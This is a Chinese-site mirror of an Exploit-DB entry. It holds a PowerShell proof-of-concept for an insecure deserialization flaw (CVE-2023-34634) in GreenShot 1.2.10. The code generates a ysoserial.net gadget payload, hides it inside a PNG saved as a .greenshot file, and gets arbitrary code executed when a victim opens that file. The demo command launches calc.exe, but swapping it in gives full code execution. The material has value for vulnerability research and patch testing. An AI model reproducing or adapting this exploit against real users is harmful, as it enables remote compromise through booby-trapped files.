GreenShot 1.2.10 – Insecure Deserialization Arbitrary Code Execution

• Exploit Database
• 51 阅读

• 作者： p4r4bellum
  日期： 2023-07-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51633/

• # Exploit Title: GreenShot1.2.10 - Insecure Deserialization Arbitrary Code Execution
  # Date: 26/07/2023
  # Exploit Author: p4r4bellum
  # Vendor Homepage: https://getgreenshot.org
  # Software Link: https://getgreenshot.org/downloads/
  # Version: 1.2.6.10
  # Tested on: windows 10.0.19045 N/A build 19045
  # CVE : CVE-2023-34634
  #
  # GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
  # A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
  # On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
  # will lead to arbitrary code execution
  #
  # Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
  ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity-c "calc" --outputpath payload.bin -o raw
  #load the payload
  $payload = Get-Content .\payload.bin -Encoding Byte
  # retrieve the length of the payload
  $length = $payload.Length
  # load the required assembly to craft a PNG file
  Add-Type -AssemblyName System.Drawing
  # the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
  $filename = "$home\poc.greenshot"
  $bmp = new-object System.Drawing.Bitmap 250,61 
  $font = new-object System.Drawing.Font Consolas,24 
  $brushBg = [System.Drawing.Brushes]::Green 
  $brushFg = [System.Drawing.Brushes]::Black 
  $graphics = [System.Drawing.Graphics]::FromImage($bmp) 
  $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) 
  $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) 
  $graphics.Dispose() 
  $bmp.Save($filename) 
  
  # append the payload to the PNG file
  $payload | Add-Content -Path $filename -Encoding Byte -NoNewline 
  # append the length of the payload
  [System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -EncodingByte -NoNewline
  # append the signature
  "Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
  # launch greenshot. Calc.exe should be executed
  Invoke-Item$filename